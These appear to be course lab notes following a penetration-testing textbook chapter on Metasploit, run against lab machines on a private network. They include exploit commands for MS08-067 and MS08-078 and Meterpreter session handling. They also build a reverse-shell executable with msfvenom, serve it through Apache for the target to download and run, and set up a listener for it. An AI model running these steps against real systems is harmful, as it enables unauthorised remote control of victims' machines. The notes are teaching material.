Ch 4: Metasploit
Following Chapter 4 of Georgia Weidman's
Penetration Testing book.
Why Use Metasploit?
- Ease of use
- Trusted base of exploit code--not all
attack code is safe to use
First command starts PostgreSQL, a database.
You don't need it for basic Metasploit
functions, but with the database
you can save scans.
The second command differs from the textbook,
because Kali 2 has a different version
of Metasploit than Kali 1 had.
Third command starts one of the interfaces
for using Metasploit.
service postgresql start
Finding Metasploit Modules
MS08-067 is a famous Windows vuln, very
powerful. Patched in 2008, but many systems
You can search for modules by
- CVE number
- OSVDB ID
- Bugtraq ID
- Microsoft Security Bulletin ID
- Any string in the text
Search for MS08-067 -- notice that
MS08-67 does not work.
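Why "MS08-67" finds nothing: the search is a plain substring match, and a bulletin number that is not zero-padded never appears in a module's name or references. The added Python below (my example, not Metasploit code) searches a small constructed index the way the page describes, then adds a normalizer that pads a bulletin ID to the MSyy-nnn form before searching. The index entries, their descriptions and the idea of normalizing first are my assumptions.

```python
import re

# Constructed sample index: module paths and bulletin IDs from this page,
# with paraphrased descriptions (not copied from Metasploit).
MODULES = {
    "exploit/windows/smb/ms08_067_netapi": {
        "name": "MS08-067 Microsoft Server Service Relative Path Stack Corruption",
        "refs": ["MSB-MS08-067"],
    },
    "exploit/windows/browser/ms08_078_xml_corruption": {
        "name": "MS08-078 Microsoft Internet Explorer Data Binding Memory Corruption",
        "refs": ["MSB-MS08-078"],
    },
}

# Microsoft Security Bulletin IDs look like MS08-067: two-digit year, dash, number.
MS_ID = re.compile(r"^ms(\d{2})-(\d{1,3})$", re.IGNORECASE)


def normalize_search_term(term):
    """Canonicalize a bulletin ID to MSyy-nnn (number zero-padded to 3 digits).

    This is an assumed helper for the reader, not something msfconsole does:
    'ms08-67' becomes 'MS08-067'; any other text is returned unchanged."""
    m = MS_ID.match(term.strip())
    if not m:
        return term.strip()
    return f"MS{m.group(1)}-{int(m.group(2)):03d}"


def search(term):
    """Case-insensitive substring match over module path, name and references,
    mirroring the 'any string in the text' search the page describes."""
    t = term.lower()
    hits = []
    for path, meta in MODULES.items():
        haystacks = [path, meta["name"], *meta["refs"]]
        if any(t in h.lower() for h in haystacks):
            hits.append(path)
    return sorted(hits)


if __name__ == "__main__":
    print(search("MS08-67"))                         # []  (unpadded ID never matches)
    print(search(normalize_search_term("MS08-67")))  # the ms08_067_netapi module
```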
Note the Module Name in the
lower left of the image below.
Note these items:
- Descriptive Name
- Module name
- Platform identifies the target systems
- Privileged tells us whether the module
requires or grants high privileges on the target
- Rank potential impact on the target, from "manual" to "excellent" (never crashes a service).
"Great" automatically detects the correct target
and is likely to succeed.
Note these items:
- Basic options: the available options
to customize the attack. Options that are
required but have no default value, such as
RHOST in the image below, must be set by
the user before running the exploit.
- Payload information helps Metasploit decide which payloads it can use with this exploit.
Details about these fields are at
Using an Exploit
Setting Module Options
Attack Server 2008 Machine
Default values are OK for the other
set RHOST 192.168.119.129
Payloads (or Shellcode)
We need to tell Metasploit what
we want to do to the target.
Shows only payloads compatible with the
Using Default Payload
If you don't choose one, Metasploit
will sometimes choose a good default.
For Linux targets, it's usually
This attack won't work on Windows Server
However, searching the Metasploit online
for "Windows 2008" finds this one:
MS08-078 Microsoft Internet Explorer Data Binding Memory Corruption
On Windows 2008 target system, open IE and
open the page shown by Metasploit,
as highlighted below:
sessions shows open sessions
sessions -i 1 starts interaction with session 1
help shows Meterpreter commands
sessions -i 1
Migrating to Another Process
List processes with ps and find
a good process to migrate to, so you'll retain
control even if the user closes the browser.
"explorer" is a good process to use. You'll need
its Process ID, which was 2176 when I did it,
but it will be different on your system.
ps | grep exp
Exiting from Meterpreter
Types of Shells
Bind Shell
Starts a process listening on the target,
on a specified port such as 4444.
Will fail if the server is behind a
firewall that blocks unused ports,
which is usually the case.
Reverse Shell
Target makes an outgoing connection to
the attacker. Much more likely to succeed
than a bind shell, especially if the
attacker's port is a common one like
80 or 443.
Setting a Payload Manually
This exploit has two network configurations:
one for the module (the Web server delivering
the exploit), and one for the reverse shell payload.
All of them have reasonable default values.
set payload windows/shell_reverse_tcp
In my case, port 4444 was busy and I had to move
to another port.
sessions -i 2
Msfcli is Gone
Msfcli was deprecated, replaced by
"msfconsole -q -x".
Its purpose is to run an exploit from a single
line of code, so it's easier to test
and script exploits.
A more detailed example is here:
msfconsole -q -x "use exploit/windows/browser/ms08_078_xml_corruption; exploit"
sessions -i 1
Creating Standalone Payloads with Msfvenom
Msfvenom replaces the older msfpayload
and msfencode commands.
Choosing a Payload
msfvenom -l payloads
msfvenom -l payloads | grep windows | grep meterpreter | grep reverse
The --payload-options switch shows the options, not "-o" as in the textbook.
msfvenom -p windows/meterpreter/reverse_tcp --payload-options
Choosing an Output Format
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.130 -f exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.130 -f exe > fun.exe
cp fun.exe /var/www/html
service apache2 start
Using the Multi/Handler Module
We need to run a server for the target
to connect to.
On target system, download
and run it.
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.119.130
Scanner HTTP Auxiliary Modules
Auxiliary Module Reference